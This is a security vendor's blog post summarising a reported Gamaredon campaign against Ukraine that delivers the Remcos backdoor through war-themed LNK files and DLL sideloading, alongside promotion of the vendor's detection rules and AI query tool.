The russia-linked Gamaredon APT notorious for a wealth of cyber-offensive operations against Ukraine resurfaces in the cyber threat arena. The ongoing Gamaredon adversary campaign against Ukraine leverages malicious LNK files disguised as war-related lures to deploy the Remcos backdoor and applies sophisticated techniques, such as DLL sideloading.

Detect Gamaredon Group Attacks 

The russia-affiliated hacking groups remain a persistent threat to organizations globally, continuously refining their tactics to evade detection. Since the outbreak of the full-scale war in Ukraine, these APT groups have escalated their operations, using the conflict as a testing ground to innovate and scale the offensive strategies. Once polished, these methods are unleashed on high-profile global targets that align with Moscow’s strategic objectives, expanding the cyber threat landscape worldwide. This relentless activity forces security professionals to seek reliable detection content and advanced threat detection and hunting tools to stay ahead of evolving adversaries.

To spot russia-backed Gamaredon APT attacks at the earliest stages, cyber defenders might rely on SOC Prime Platform serving a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Just press the Explore Detections button below and immediately drill down to curated Sigma rules set addressing the latest Gamaredon campaign spreading Remcos.

Explore Detections

All the rules are compatible with the multiple SIEM, EDR, and Data Lake technologies and mapped to the MITRE ATT&CK® framework to streamline threat investigation. Additionally, each rule is enriched with extensive metadata, including CTI links, attack timelines, triage recommendations, and more.

Additionally, security professionals can hunt for IOCs from the latest Cisco Talos report on the latest Gamaredon campaign. With Uncoder AI acting as a private non-agentic AI for threat-informed detection engineering, defenders can enable fast IOC sweeps by automatically parsing these IOCs and transforming them into custom queries tailored for the chosen SIEM or EDR platform. 

And there is a lot more Uncoder AI can offer. In March, SOC Prime released a major upgrade to Uncoder AI, which offers privacy-first, unlimited AI LLM capabilities letting you always stay in control of your interaction with AI. Automatically detect the language of your code and gain a concise summary or an in-depth decision tree, supercharge your detection strategies with MITRE ATT&CK® ML-powered code tagging and unlimited autocompletion, and optimize your native-language query with AI. 

Security professionals seeking more detection content addressing Gamaredon TTPs to analyze the group’s activity retrospectively might browse Threat Detection Marketplace using the following tags: “UAC-0010,” “Gamaredon,” “Hive0051,” “ACTINIUM,” “Primitive Bear,” “Armageddon Group,” “Aqua Blizzard,” “WINTERFLOUNDER,” “UNC530,” “Shuckworm.”

Gamaredon Campaign Analysis: Latest Attacks Spreading Remcos

The russian state-sponsored APT group known as Gamaredon Group (aka Hive0051, UAC-0010, or Armageddon APT) has been conducting cyber-espionage campaigns against Ukrainian organizations since 2014, ramping up its attacks following russia’s full-scale invasion of Ukraine on February 24, 2022. Despite the ongoing conflict, the group has maintained a steady level of activity, continuously deploying its malicious tools and remaining the most persistent hacking entity targeting Ukraine.

Cisco Talos researchers have uncovered an ongoing Gamaredon campaign that relies on spear-phishing to target Ukrainian users with weaponized LNK files disguised as Office documents. Active since November 2024, the latest group’s campaign exploits war-related themes to deliver the Remcos backdoor. While the exact delivery method remains unclear, researchers suspect Gamaredon continues using phishing emails, either attaching the ZIP file directly or providing a link to download it from a remote server.

Notably, the Remcos RAT leveraged in the latest Gamaredon’s offensive operation is commonly abused by cybercriminals for data theft and system manipulation and has long been part of the adversary toolkit of multiple hacking collectives targeting Ukraine. For instance, the russia-backed hacking group UAC-0050 has weaponized Remcos in phishing attacks, primarily against Ukrainian state entities. 

Gamaredon has previously been known for exploiting the Ukraine invasion theme in its phishing campaigns, and this operation follows the same pattern. The group distributes malicious LNK files within ZIP archives, often masquerading as Office documents with invasion-related filenames. 

Gamaredon’s latest campaign uses malicious LNK files containing obfuscated PowerShell scripts to download and execute the Remcos backdoor while displaying a decoy file to mask infection. These scripts use the Get-Command cmdlet to bypass string-based detection. The payload servers, based in Germany and russia, restrict access to Ukrainian victims.

Once downloaded, the ZIP file is extracted to the %TEMP% folder, where a legitimate application loads a malicious DLL via sideloading. This technique decrypts and runs the final Remcos payload, evading traditional defenses. The phishing emails likely include either direct ZIP attachments or links to download them.

The campaign exploits geopolitical themes, and metadata analysis suggests only two machines generated these LNK files, which aligns with Gamaredon’s previous tactics.

The use of advanced adversary techniques in the latest Gamaredon campaign, such as DLL sideloading, geo-fenced servers, and themed phishing lures points to the group’s ongoing efforts to target Ukraine amid geopolitical unrest. To counter these threats, organizations are encouraged to strengthen their defenses at scale. SOC Prime Platform for collective cyber defense equips security teams with cutting-edge technologies that fuse AI, automation, and real-time threat intelligence to help them proactive defend against APT attacks and evolving cyber threats.